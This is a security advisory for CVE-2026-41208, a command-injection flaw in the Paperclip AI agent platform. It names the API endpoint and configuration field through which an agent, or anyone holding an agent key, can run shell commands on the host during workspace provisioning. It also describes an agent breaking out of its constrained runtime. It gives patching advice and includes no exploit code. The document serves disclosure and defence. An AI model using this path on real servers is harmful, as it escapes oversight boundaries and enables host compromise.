Paperclip server host command injection (CVE-2026-41208)

Vendor-confirmed - CVE-2026-41208 is a high remote code execution vulnerability in Paperclip AI agent platform versions prior to 2026.416.0 that grants attackers with only a low-privilege Agent API key full host-level command execution.

Overview

A high-severity privilege escalation vulnerability in the Paperclip AI agent platform allows an attacker to execute arbitrary operating system commands on the underlying server. The flaw, tracked as CVE-2026-41208, affects versions of the @paperclipai/server package prior to 2026.416.0. An attacker needs only a low-privilege Agent API key to achieve full remote code execution on the host.

Vulnerability Details

Paperclip is a Node.js and React-based platform that uses AI agents to automate business operations. The vulnerability exists because agents are permitted to modify their own configuration via the /agents/:id API endpoint. A specific configuration field, adapterConfig.workspaceStrategy.provisionCommand, is not properly sanitized. The Paperclip server later executes the contents of this field during workspace provisioning.

This breaks the intended security boundary, allowing an agent-which is supposed to operate within a constrained runtime-to inject and execute shell commands with the privileges of the main Paperclip server process. This could be a compromised agent or a malicious actor who has obtained an agent credential.

Impact

The primary impact is full remote code execution (RCE) on the host machine running the Paperclip server. A successful attacker could install malware, exfiltrate sensitive data, establish persistence, or move laterally within the network. Given that Paperclip orchestrates business operations, the server likely has access to internal APIs, databases, and other critical systems, amplifying the potential damage of a breach.

Affected Versions and Remediation

All versions of the @paperclipai/server npm package earlier than 2026.416.0 are vulnerable.

Immediate Action Required: Administrators must update their Paperclip server installation to version 2026.416.0 or later. This can typically be done by updating the package in your package.json file and running your standard update command (e.g., npm update).

If an immediate update is not possible, consider reviewing and restricting network access to the Paperclip server’s API endpoints as a temporary measure. However, patching is the only complete solution.

Security Insight

This vulnerability highlights the inherent risk in platforms that dynamically execute user or agent-supplied configuration. It mirrors past incidents in CI/CD and DevOps tools where a “configuration-as-code” feature became a vector for command injection. As AI agent platforms grow in complexity, ensuring strict isolation between agent runtime instructions and host-level execution will be a critical, recurring security challenge. For more on how software vulnerabilities can lead to major incidents, see our breach reports.

Further Reading

• All High Vulnerabilities
• Recent Critical Vulnerabilities
• Top Critical CVEs